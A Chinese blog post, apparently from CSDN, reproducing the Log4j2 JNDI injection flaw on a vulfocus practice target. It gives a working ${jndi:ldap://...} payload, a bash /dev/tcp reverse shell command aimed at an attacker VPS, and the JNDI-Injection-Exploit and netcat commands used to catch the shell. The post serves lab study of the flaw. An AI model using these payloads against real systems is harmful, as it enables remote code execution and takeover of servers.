vulfocus-fofa靶场 Log4j2远程命令执行复现

已于 2022-01-23 00:15:40 修改
阅读量4.9k 收藏 1
点赞数 4
文章标签: 安全 java web安全
于 2021-12-31 14:15:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48817022/article/details/122230938
版权

Log4j2远程命令执行复现

文章目录

前言

一、Apache Log4j2漏洞描述

描述: Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。。

二、复现环境

环境是http://vulfocus.fofa.so平台的
在这里插入图片描述

01.工具

下载:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

02.漏洞验证过程

02.1 POST请求,构造payload=xxx

http://vulfocus.fofa.so:56688/hello
POST
payload=${jndi:ldap://o5grdz.dnslog.cn/}

在这里插入图片描述
02.2 dns解析平台
http://www.dnslog.cn/
在这里插入图片描述

03.反弹shell

base64加密shell反弹
使用:https://www.jackson-t.ca/runtime-exec-payloads.html
构造反弹shell命令:

bash -i >& /dev/tcp/vps-ip/port 0>&1

在这里插入图片描述
使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload
开启服务生成链接payload并开启nc监听,生成的链接每个都试一下。

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "反弹shell命令" -A vps-ip

在这里插入图片描述

VPS开启监听8080端口nc -lvp 8080
在这里插入图片描述
利用Burp发送payload
注意标签头:Content-Type
可能有一些浏览器抓包没有这个标签头,没有这个标签头请求成功,但vps监听不会接收到任何数据,可以手动添加Content-Type头;

Content-Type:application/x-www-form-urlencoded

在这里插入图片描述

反弹成功
在这里插入图片描述

nc反弹成功
在这里插入图片描述

总结

如果反弹不成功请检查①vps防火墙端口是否开放,②构造命令时编码是否正确。

ღALI
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
apache log4j2vulfocus靶场漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-21 1251
Apache Log4j2被曝出一个高危漏洞,攻击者通过jndi注入攻击的形式可以轻松远程执行任何代码。apache log4j2vulfocus靶场漏洞复现,随后官方紧急推出了2.15.0和2.15.0-rc1新版本修复,依然未能完全解决问题,现在已经更新到2.15.0-rc2(近日已推出2.16版本)。该漏洞被命名为Log4Shell,编号CVE-2021-44228 一、环境搭建-vulfocus靶场,本次漏洞复现采用vulfocuslog4j2靶场docker,使用Kali系统进行复现实验。
渗透字典-fofa测绘语句
02-08
在使用fofa搜索引擎时一些常用的搜索语句。
vulfocus复现Log4j2远程命令执行(CVE-2021-44228)
m0_71518346的博客
12-17 662
富的特性。该日志框架被大量用于业务Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
FOFA-攻防挑战
蚁景网安学院
07-07 839
在昨天初尝战果之后,发现今天还有挑战赛,按捺不住躁动的心,又开始了学习。今天主要拿下的是这四个镜像,同时我也会对我了解的漏洞详情做一个具体的分析...
Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习
最新发布
weixin_58085973的博客
04-18 197
【代码】Log4j 远程代码执行漏洞检测_fofa搜索log4j漏洞(1),2024年最新网络安全编程基础学习。
(2022年12月最新)最详细vulfocus靶场 Log4j2远程命令执行漏洞复现
qq1140037586的博客
12-15 1007
1、向目标发送指定payload,目标对payload进行解析执行,然后会通过ldap链接远程服务,当ldap服务收到请求之后,将请求进行重定向到恶意 java class的地址。 2、目标服务器收到重定向请求之后,下载恶意class并执行其中的代码,从而执行系统命令
vulfocus复现:Spring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 989
vulfocus复现:Spring Framework 远程命令执行漏洞
Vulfocus复现log4j2vulhub复现log4j2(CVE-2021-44228)
人若有志,就不会在半坡停止。
11-07 894
由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。Log4j 是一款开源 Java 日志记录工具。日志记录主要用来监视代码中变量的变化情况,周期性的记录到文件中供其他应用进行统计分析工作;跟踪代码运行时轨迹,作为日后审计的依据;担当集成开发环境中的调试器的作用,向文件或控制台打印代码的调试信息。
Fofa-gui fofa快速采集工具
01-19
注:仅供学习使用,不能用于非法用途,大家可以根据需要下载。
fofa-tool FOFA api查询工具复活版
11-22
2、自动分页,每页500条,最大10000条(根据Fofa的会员等级会有所不同) 3、支持导出scv文件 说明:fofa_tool 官网更新了域名,导致原有的工具失效。重新修改了工具中的域名,让工具重新复活可用。 运行环境:需...
Fofa-collect:Fofa平台采集工具
05-01
Fofa-collectV3.0支持jdk8直接运行jdk11因为没有javafx这个依赖需要自己再加上参数java -Dfile.encoding="UTF-8" --module-path "C:\Program Files\Java\javafx-sdk-11.0.2\lib" --add-modules "javafx.controls,...
fofa指纹识别库(更新于2019)
11-19
fofa指纹识别库,更新于2019。 年长年少,开心就好;
Fofa-collect:Fofa采集工具
04-03
闲着没事,发现网上的fofa采集工具都不怎么好用,然后自己揉了一个。。。功能查询功能(MD废话)导出功能自动生成icon_hash功能(贼好用)生成icon_hash功能演示博客: :
本地搭建vulfocus靶场&复现log4j2漏洞
xhscxj的博客
09-10 1825
环境用的是linux下的centos1.首先需要在centos中安装docker环境3.下载vulfocus镜像4.映射到centos中5.完成后访问centos的ip即可。
vulfocus复现Log4j2远程命令执行2
woai_zhongguo的博客
07-15 675
Log4j2远程命令执行2复现过程
Log4j2远程命令执行复现
yzl_007的博客
12-12 3890
Log4j2远程命令执行复现 Log4j2远程命令执行复现一、漏洞环境二、漏洞验证三、反弹shell 一、漏洞环境 环境是http://vulfocus.fofa.so平台的 二、漏洞验证 启动环境后访问 抓包,修改请求为post 在数据中的Accept:头插入exp ${jndi:ldap://8hqrxz.dnslog.cn} 成功回显到dnslog平台 三、反弹shell 使用 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 生成payload 可以在这里
Log4j2远程命令执行复现CVE-2021-12-09】
qq_55213436的博客
03-21 460
Log4j2是基于log4j这个java日志处理组件进行二次开发和改进而来的。也是目前最常用的日志框架之一,在之前的博客中()我们阐述了漏洞的原理和大致的利用方法。今天就借助dockers拉取vulfocus上的漏洞环境进行漏洞复现和利用的介绍。
weblogic弱口令漏洞复现
懂进攻知防守
07-20 1325
本文记录weblogic弱口令拿下某网站实例,仅供教学参考,后果自负!
vulfocus靶场搭建(实测)
热门推荐
m0_50406447的博客
07-28 3万+
vulfocus的特性 1.启动:一键漏洞环境启动,方便简单。 2.自带 Flag 功能:每次启动 flag 都会自动更新,明确漏洞是否利用成功。 3.带有计分功能也可适用于相关安全人员能力的考核。 4.兼容 Vulhub、Vulapps 中所有漏洞镜像。 一、使用centos7作为靶机环境 1.挂载镜像 mkdir /mnt/cdrom:创建挂载点 mount /dev/cdrom /mnt/cdrom:镜像挂载 注意:这个必须已连接,否则镜像挂载失败 2.配置yum源 (1)进入y
fofa-collect怎么安装
10-01
在终端或命令提示符窗口中,切换到Fofa-collect代码所在的目录,运行以下命令来启动Fofa-collect: ``` python fofa-collect.py ``` 现在,你已经成功安装和运行了Fofa-collect。你可以根据实际需求来使用这个工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值